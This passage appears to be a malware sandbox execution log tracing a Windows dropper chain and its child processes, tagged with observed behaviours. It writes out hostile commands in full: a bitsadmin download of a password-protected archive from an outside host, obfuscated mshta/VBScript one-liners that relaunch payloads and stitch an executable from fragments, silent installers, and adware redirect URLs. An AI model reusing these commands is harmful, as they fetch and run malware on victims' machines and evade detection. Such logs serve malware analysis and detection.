C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac20471813⤵
-
C:\Users\Admin\AppData\Local\Temp\2b-3bbc5-208-be3a0-37c95a149b797\Jyzhycysolae.exe"C:\Users\Admin\AppData\Local\Temp\2b-3bbc5-208-be3a0-37c95a149b797\Jyzhycysolae.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3zwoz2li.dnb\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\3zwoz2li.dnb\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\3zwoz2li.dnb\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 20536 -s 27614⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cln0trtv.0md\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\cln0trtv.0md\installer.exeC:\Users\Admin\AppData\Local\Temp\cln0trtv.0md\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\biatarhc.rap\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\biatarhc.rap\any.exeC:\Users\Admin\AppData\Local\Temp\biatarhc.rap\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\taq2qa3x.ik4\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\taq2qa3x.ik4\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\taq2qa3x.ik4\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 20620 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbnmnnoj.lhw\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\cbnmnnoj.lhw\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\cbnmnnoj.lhw\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -piKZNpnxj7ps2Vba -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZy3DKDGFkSCqK3x -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK15⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8C7F.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Users\Admin\Documents\V0r_jI4hAYH6tmEtRu0LFAGe.exe"C:\Users\Admin\Documents\V0r_jI4hAYH6tmEtRu0LFAGe.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\ohd5DBCBKYGq0Rq0oGsWYQsB.exe"C:\Users\Admin\Documents\ohd5DBCBKYGq0Rq0oGsWYQsB.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\ohd5DBCBKYGq0Rq0oGsWYQsB.exe"C:\Users\Admin\Documents\ohd5DBCBKYGq0Rq0oGsWYQsB.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 10487⤵
- Program crash
-
C:\Users\Admin\Documents\RUW_kzSDDh7kY9iBvGNxl4kc.exe"C:\Users\Admin\Documents\RUW_kzSDDh7kY9iBvGNxl4kc.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\RUW_kzSDDh7kY9iBvGNxl4kc.exe"C:\Users\Admin\Documents\RUW_kzSDDh7kY9iBvGNxl4kc.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\VjZeiygwhnphQDOoeFIAGxDT.exe"C:\Users\Admin\Documents\VjZeiygwhnphQDOoeFIAGxDT.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2500632.scr"C:\Users\Admin\AppData\Roaming\2500632.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\6130498.scr"C:\Users\Admin\AppData\Roaming\6130498.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\1847311.scr"C:\Users\Admin\AppData\Roaming\1847311.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1421342.scr"C:\Users\Admin\AppData\Roaming\1421342.scr" /S7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15ac1df9305ded09.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15ac1df9305ded09.exeWed15ac1df9305ded09.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 19166⤵
- Program crash
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed150b6a68b74a9.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed150b6a68b74a9.exeWed150b6a68b74a9.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15cdfe4f1ee8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15cdfe4f1ee8.exeWed15cdfe4f1ee8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15cdfe4f1ee8.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15cdfe4f1ee8.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15cdfe4f1ee8.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15cdfe4f1ee8.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Wed15cdfe4f1ee8.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1556d5b7e9b2c8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed1556d5b7e9b2c8.exeWed1556d5b7e9b2c8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15bfd6504f7748c.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15bfd6504f7748c.exeWed15bfd6504f7748c.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15566afaea59e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15566afaea59e.exeWed15566afaea59e.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15edb855a49.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15c2e7469a14dca.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15c2e7469a14dca.exeWed15c2e7469a14dca.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15fbd6ef41b4f.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15e2f113a40ce5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv bIwyp2o330q1fggh9KFnew.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15e2f113a40ce5.exeWed15e2f113a40ce5.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15e2f113a40ce5.exeC:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15e2f113a40ce5.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15fbd6ef41b4f.exeWed15fbd6ef41b4f.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-PIIPN.tmp\Wed15fbd6ef41b4f.tmp"C:\Users\Admin\AppData\Local\Temp\is-PIIPN.tmp\Wed15fbd6ef41b4f.tmp" /SL5="$10216,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15fbd6ef41b4f.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-LVI15.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-LVI15.tmp\Sayma.exe" /S /UID=burnerch23⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Windows Sidebar\TBPJJXKBRU\ultramediaburner.exe"C:\Program Files\Windows Sidebar\TBPJJXKBRU\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-H0UVR.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-H0UVR.tmp\ultramediaburner.tmp" /SL5="$202C0,281924,62464,C:\Program Files\Windows Sidebar\TBPJJXKBRU\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\19-0bffa-c59-29e81-fd6697d7349a3\Nobobikagu.exe"C:\Users\Admin\AppData\Local\Temp\19-0bffa-c59-29e81-fd6697d7349a3\Nobobikagu.exe"4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac2047186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,7637699779783744294,14799373560867554873,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,7637699779783744294,14799373560867554873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac2047186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514835⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac2047186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515135⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac2047186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872155⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac2047186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631195⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac2047186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942315⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac2047186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac2047186⤵
-
